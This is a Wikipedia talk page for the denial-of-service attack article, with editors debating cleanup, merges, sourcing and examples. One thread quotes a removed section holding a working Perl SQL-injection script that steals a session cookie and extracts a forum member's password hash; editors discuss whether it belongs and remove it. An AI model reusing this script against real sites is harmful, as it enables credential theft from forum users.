Talk:Denial-of-service attack

From Wikipedia, the free encyclopedia

Image DoSed

Interestingly, the image portraying DoS is DoSed. Ironic and very frustrating. At least IE and FF can't make it work, dunno about Opera. 6/4/08 —Preceding unsigned comment added by 77.126.65.64 (talk) 08:46, 4 June 2008 (UTC)

Protected on 2006 April 18

Reason: Vulgarisms or nonsense was continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)

Cleanup

Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

Rewrote DDoS bit

Added some references; I was bored.

Removed some of the stuff in the prevention and response section; it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up, and some of it was factually wrong. This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section.

218.145.101.210 deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 60.240.174.85 12:28, 24 July 2006 (UTC)

Discussion Points

I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed more easily:

  1. Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with. Other network protocols exist which benefit rather than degrade with increased scaling of requests. Freenet is one example.
  2. The similarity with slashdotting.
  3. "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
  4. "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
  5. Mention of operating system/kernel-level defences
  6. Removing the ad-like content towards the bottom along with related ads —Preceding unsigned comment added by Fintler (talk • contribs)

New category 'Computer Network Security'

I propose to create a new category 'Computer Network Security' and assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)

There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)
I think that much of what is on the DOS category could be moved into the DOS article. That will give the article a better chance of reaching featured status. It will also get rid of the problem described above since the only sub-articles that would survive are those that are large enough to be left alone. Thus, most of the stuff on the DOS category could be moved, once this is done, into the Computer Network Security cat. I will slowly work on it. Brusegadi 06:07, 28 August 2007 (UTC)

DDoS section inaccuracies

A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this:

  1. "...when multiple compromised systems..." - The systems do not have to be compromised. DDoS attacks are just as commonly from groups of willing users who don't realise they aren't anonymous. (i.e. script kiddies)
  2. "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is a big reason why some like to use Tor, to hide their IP from being DDoSed.
  3. Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
  4. Would we consider a crapflood a DDoS?

Happy editing to all. Michael Billington (talk • contribs) 11:28, 6 August 2006 (UTC)

injection is DoS?

Should the === MySQL injection === section be in this article? Although SQL injection can cause a DoS condition, it is not a DoS attack in itself, is it? If it is considered a DoS attack, should the code be a little bit more illustrative? It simply displays a general SQL injection, not an SQL injection that causes a DoS condition.

Overall I feel the section with source code is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talk • contribs) 17:24, 15 August 2006 (UTC).

It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited about my first Wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)

Sounds good & welcome to Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)


Putting the old section here for now.

MySQL injection

MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is a malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:


#!perl
#Greetz or begining message of the 404 would go here.
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];
if (@ARGV < 4) {
 print "---------------------------------------------------------\n";
 print "-- This is a MySQL Injection --\n";
 print "-- Coded by Some Hacker --\n";
 print "-- I am a n00b Hacker --\n";
 print "-- Usage: $0 [host] [path] [topic] [id] --\n";
 print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";
 print "---------------------------------------------------------\n";
 exit();
}
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a     connection\n";
print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
            $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
            $cookie = $1;
        }
}
$sock->close;
$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a  connection\n";
print "-- Connection Established --\n";
print $socket "GET   /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";
while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
                 next;
            }
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";
            exit;
       }
}

Coded By: Derek H.

Fedevela 11:26, 16 August 2006 (UTC)


OK! Finished editing that section ... I have not tested the code, and I am not positive you can insert EL expressions in the SQL tag like I'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQL injection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

Should there be code offered here?

Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)

*smirks*

The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

Client Puzzle Protocol

- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talk • contribs) 03:05, 13 December 2006 (UTC).

Looks completely useless to me. Most DoS attacks do not require a complete connection to be made so any sort of "puzzle protocol" can't even be started. Wrs1864 03:11, 13 December 2006 (UTC)

Effects

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. —Ryan 06:54, 6 March 2007 (UTC)

Removed make technical articles accessible tag

The {{technical}} tag was added June 23 of 2006, but I'm not entirely clear on why, or that it remains applicable. I've gone ahead and removed it.

If anyone believes it still applies, feel free to re-add it — but please provide a specific explanation of why it's necessary, as per these standards: "You should put an explanation on the talk page with comments on why you believe it is too technical, or suggestions for improvement. Templates added without explanation are likely to be either ignored or removed." livefastdieold 00:41, 15 April 2007 (UTC)

Cleaned up links

I cleaned up the links as there were multiples of the same site and unneeded links that were borderline spam. Warrush

Merge from Nuke

I think the merge is good. I will do it if the editors who are most involved with this page think it is not a problem. I think merging them will give this article a boost towards featured status. Brusegadi 00:23, 26 August 2007 (UTC)

Done! Brusegadi 05:52, 28 August 2007 (UTC)

Merge from Teardrop

The source is so small that, at least for now, it makes sense to merge. I will proceed as I did with the merge for nuke. Brusegadi 06:54, 29 August 2007 (UTC)

Done. Brusegadi 05:09, 31 August 2007 (UTC)

Intentions?

What do we think about this statement?

Although most DDoS attacks are malicious in nature, the same technique can be used to aid the Internet community. --Leus 21:07, 4 September 2007 (UTC)

Should be removed. I will go through the entire article and look for proper sources and remove such statements. Thanks for the note. Brusegadi 04:26, 5 September 2007 (UTC)

Fair use rationale for Image:Yahelitescrnscap.JPG

Image:Yahelitescrnscap.JPG is being used on this article. I notice the image page specifies that the image is being used under fair use but there is no explanation or rationale as to why its use in this Wikipedia article constitutes fair use. In addition to the boilerplate fair use template, you must also write out on the image description page a specific explanation or rationale for why using this image in each article is consistent with fair use.

Please go to the image description page and edit it to include a fair use rationale. Using one of the templates at Wikipedia:Fair use rationale guideline is an easy way to insure that your image is in compliance with Wikipedia policy, but remember that you must complete the template. Do not simply insert a blank template on an image page.

If there is other fair use media, consider checking that you have specified the fair use rationale on the other images used on this page. Note that any fair use images uploaded after 4 May, 2006, and lacking such an explanation will be deleted one week after they have been uploaded, as described on criteria for speedy deletion. If you have any questions please ask them at the Media copyright questions page. Thank you.

BetacommandBot 18:31, 13 September 2007 (UTC)

Merge with Meow wars

Someone tagged Meow wars to merge here. Discuss.

  • Support. It has no evidence of notability or much in the way of reliable sources itself, so does not rate a whole article, but there's enough to it to be worth a mention in the topic it applies to. Dicklyon 16:07, 23 September 2007 (UTC)
  • Go for it. Just name the subsection 'Meow wars' or something and then only transfer a shortened version of everything. Note that if you move the entire thing the article is going to get too big. Brusegadi 16:40, 23 September 2007 (UTC)
  • Oppose (I think). Meow wars seems closer to a social phenomenon than a denial of service (are we next going to add Wikipedia vandalism, spam (electronic), and any number of random flame wars and people trying to annoy each other on the net?). The meow wars article could use some work, but I'd probably sooner merge it to Usenet than to here. Or keep it as its own article; it was kind of a big deal within the world of usenet even if it seems obscure in a wider context (establishing WP:N is kind of a can of worms for many online phenomena, but that's an issue whether it is its own article or just a section in another article). Kingdon 18:06, 16 October 2007 (UTC)
    Actually that isn't really true. Notability matters in all cases but there are a lot of things which are notable enough for a brief mention in another article but not for a separate article. Nil Einne 12:50, 21 October 2007 (UTC)
  • I have to agree with Kingdon. I think that the Meow wars page needs more work before it's merged with anything really. Perhaps you could make reference to the Meow wars being an early/primitive form of DOS attack and link to the article? Where the article stands now, I don't think there's enough solid information and sources cited to back up what's been said. CoyoteWildfire 10:14, 24 October 2007
  • Oppose Meow wars is an interesting article in its own right, but it needs some work. Bitplane 23:37, 17 December 2007 (UTC)
  • Oppose, as people have pointed out they are not quite the same thing as well as merging serves no useful purpose regardless in this instance. Mathmo Talk 00:40, 24 January 2008 (UTC)

Anonymous vs. Church of Scientology

http://youtube.com/watch?v=YnEqXMMCDEc —Preceding unsigned comment added by 71.128.69.207 (talk) 19:17, 27 January 2008 (UTC)

Statistics

Just found this on ITPROs news section:

"DOS attacks are also becoming increasingly common. During the first six months of 2006, Symantec observed an average of 6,110 DoS attacks per day."

http://www.itpro.co.uk/security/news/98616/analysis-websites-struggling-for-legal-recourse-for-dos-attacks.html

Anyone think the statistic is worth including? It'll give a better idea of how occurrent the problem has become...

Also, I'm rubbish at editing so if anyone wants to put it in... —Preceding unsigned comment added by 86.149.69.210 (talk) 07:45, 18 March 2008 (UTC)

Not completely wikified.

I've added some internal links to the section that needs to be wikified, but I don't feel that there are enough for it to be up to Wikipedia's standards. I've also changed the acronym "DDoS" in that section to "DoS" (but in that section only) because, from my understanding, a DDoS attack is just a form of a DoS attack. I didn't remove the Wikify template, though, because I felt that it wasn't up to standard. Thanks. Totakeke423 (talk) 10:25, 29 March 2008 (UTC)

Suggestions

The following suggestions were generated by a semi-automatic javascript program, and might not be applicable for the article in question.

  • There may be an applicable infobox for this article. For example, see Template:Infobox Biography, Template:Infobox School, or Template:Infobox City. (Note that there might not be an applicable infobox; remember that these suggestions are not generated manually)
  • When writing standard abbreviations, the abbreviations should not have a 's' to demark plurality (for example, change kms to km and lbs to lb).
  • There are a few occurrences of weasel words in this article- please observe WP:AWT. Certain phrases should specify exactly who supports, considers, believes, etc., such a view.
    • correctly
    • might be weasel words, and should be provided with proper citations (if they already do, or are not weasel terms, please strike this comment).
  • Watch for redundancies that make the article too wordy instead of being crisp and concise. (You may wish to try Tony1's redundancy exercises.)
    • Vague terms of size often are unnecessary and redundant - “some”, “a variety/number/majority of”, “several”, “a few”, “many”, “any”, and “all”. For example, “All pigs are pink, so we thought of a number of ways to turn them green.”
  • Avoid using contractions like (outside of quotations): doesn't, aren't.
  • Please ensure that the article has gone through a thorough copyediting so that it exemplifies some of Wikipedia's best work. See also User:Tony1/How to satisfy Criterion 1a.

You may wish to browse through User:AndyZ/Suggestions for further ideas. Thanks, CWii(Talk|Contribs) 22:04, 2 May 2008 (UTC)

political examples

The article is missing info on examples of politically motivated DoSs; see [1] --Espoo (talk) 13:11, 21 May 2008 (UTC)